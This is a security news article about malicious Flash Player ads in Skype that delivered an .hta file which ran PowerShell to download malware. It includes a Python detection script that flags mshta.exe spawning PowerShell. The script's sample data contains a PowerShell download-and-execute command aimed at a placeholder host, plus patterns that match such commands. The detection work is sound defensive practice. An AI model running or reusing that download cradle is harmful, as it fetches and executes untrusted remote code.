According to several user complaints that recently appeared on Reddit and Twitter, the official Skype application pushed malicious Adobe Flash Player ads to users. Users reported receiving the ad right after logging into Skype; it prompted them to install a file named FlashPlayer.hta. An .hta file is an HTML Application, which Windows executes through mshta.exe with the privileges of the logged-in user and outside the browser's security restrictions, so any script it contains runs as a normal program. If the user accepts, assuming that a legitimate program such as Skype would only suggest a required component or update, the JavaScript embedded in the .hta file launches a PowerShell script, which connects to a website hosting the malware and downloads it from there. The domains known to have hosted the final payload were oyomakaomojiya(.)org and cievubeataporn(.)net. Both were taken down quickly, so malware analysts were unable to retrieve a sample of the payload from either of them.
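As an added example (not part of the original article, and not a sample of the malware), the following Python flags the chain described above in process-creation telemetry: mshta.exe, the Windows host for .hta files, spawning powershell.exe with download-cradle arguments. The events, paths, PIDs and the placeholder URL are constructed for the example, and the field names assume Sysmon-style process-creation logs.

```python
"""
Flag the mshta.exe -> powershell.exe download chain described in the article
from process-creation telemetry. Events below are constructed for this
example and use Sysmon-style fields (pid, parent pid, image path, command line).
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # command line as logged


# Constructed sample telemetry (not real data). The chain mirrors the report:
# Skype.exe -> mshta.exe FlashPlayer.hta -> powershell.exe download cradle.
# The URL is a placeholder, not one of the domains named in the article.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Skype\Phone\Skype.exe", "Skype.exe"),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Users\alice\Downloads\FlashPlayer.hta"'),
    ProcEvent(400, 300,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -W Hidden -Exec Bypass -Command "
              "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"),
    # Benign admin PowerShell launched from Explorer: must not be flagged.
    ProcEvent(500, 100,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\inventory.ps1"),
]

# Command-line fragments typical of PowerShell download cradles.
CRADLE_INDICATORS = {
    "download_string": re.compile(r"DownloadString", re.I),
    "download_file": re.compile(r"DownloadFile", re.I),
    "invoke_webrequest": re.compile(r"Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}


def _name(path: str) -> str:
    """Basename of an image path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def find_hta_powershell_chains(events):
    """Return one finding per powershell.exe whose parent is mshta.exe.

    Each finding records the .hta path from the parent's command line, which
    cradle indicators were present, and the process that launched mshta.exe.
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if _name(e.image) != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or _name(parent.image) != "mshta.exe":
            continue
        hta = re.search(r'([^"\s]+\.hta)\b', parent.cmdline, re.I)
        grand = by_pid.get(parent.ppid)
        findings.append({
            "pid": e.pid,
            "parent_pid": parent.pid,
            "hta": hta.group(1) if hta else None,
            "indicators": [k for k, rx in CRADLE_INDICATORS.items()
                           if rx.search(e.cmdline)],
            "launched_by": _name(grand.image) if grand else None,
        })
    return findings


if __name__ == "__main__":
    for finding in find_hta_powershell_chains(SAMPLE_EVENTS):
        print(finding)
```

The parent-child relation is the primary signal: mshta.exe launching PowerShell is rare in legitimate use, so it is worth alerting on even when no cradle indicator matches. The indicator list only adds context for triage, and the benign Explorer-launched PowerShell event in the sample shows that ordinary administrative scripts are not flagged by the parent check.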
Researchers also discovered that both domains were registered with email accounts that had been used to set up numerous other questionable websites, and the IP addresses hosting some of those sites led to servers that hosted still more malicious ones. These sites reportedly served malware and were used to distribute malicious JavaScript files, which can deliver ransomware, Trojans, or other malicious programs to a victim's computer.
This suggests the attack against Skype users was carried out by an organized cybercrime group. The group appears to register new domains and abandon old ones daily, which keeps malware researchers from obtaining the samples it pushes to victims. Although no further malicious ads were spotted over the following days, we recommend caution with any suspicious ads that appear in Skype, particularly prompts to install Flash Player or other updates from within the app. Keep your anti-malware software running, and if you want to know the tricks scammers use against Skype users, read this article about Skype viruses. Recently, a large number of users complained about a virus that hijacks their accounts and sends odd baidu.com links to all of their contacts.